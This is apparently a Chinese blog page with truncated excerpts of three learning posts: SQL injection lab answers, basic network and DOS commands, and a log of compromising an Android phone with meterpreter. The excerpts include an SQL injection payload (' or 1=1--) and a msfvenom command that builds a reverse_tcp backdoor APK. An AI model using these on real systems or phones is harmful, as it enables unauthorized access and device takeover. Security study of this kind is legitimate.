- 博客(3)
- 收藏
- 关注
RSS订阅原创 SQL注入
1.该实验室在产品类别过滤器中包含一个SQL注入漏洞。当用户选择类别时,应用程序将执行如下SQL查询:SELECT * FROM products WHERE category = ‘Gifts’ AND released = 1要解决此问题,请执行SQL注入攻击,使应用程序显示任何类别的所有产品的详细信息,包括已发布和未发布。 解题:点进类别,把后缀改为category=‘ or 1=1--(--代表注释后面内容) 2.该实验在登录功能中包含一个SQL注入漏洞。要解决此问题,请执行SQL注入攻击,以ad
2021-02-05 16:12:11
130
原创 2021-01-31
IP地址详解 ipconfig #查看IP地址基本信息 ipconfig #查看IP地址详细信息 ping + 目标IP地址 #测试网络联通性 ping -t + 目标IP地址 #一直ping ping -n 数字 + 目标IP地址 #ping包的数量 nslookup www.**.com #手工解析域名的ip地址 基本dos命令 命令行操作 d: #切换到d盘目录 echo #创建文件 copy on 文件名.扩展名 #开始编辑内容,ctrl+z回车结束编写 dir #列出目录下文件
2021-02-03 15:47:33
136
原创 简单记录自己利用meterpreter入侵安卓机
简单记录自己利用meterpreter入侵安卓机 需要准备 一台安卓机 安装kali Linux系统 入侵流程 kali终端执行 msfvenom -p android/meterpreter/reverse_tcp lhost=(kali linux的IP地址) lport=5555 R>/root/a.apk可以看到在root目录下生成了a.apk文件 将apk文件发送到安卓手机(方式自行选择,此处可扩展) 手机安装apk,为了测试成功,还需根据测试目的授予相应权限 kali
2021-01-16 23:13:09
1502
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人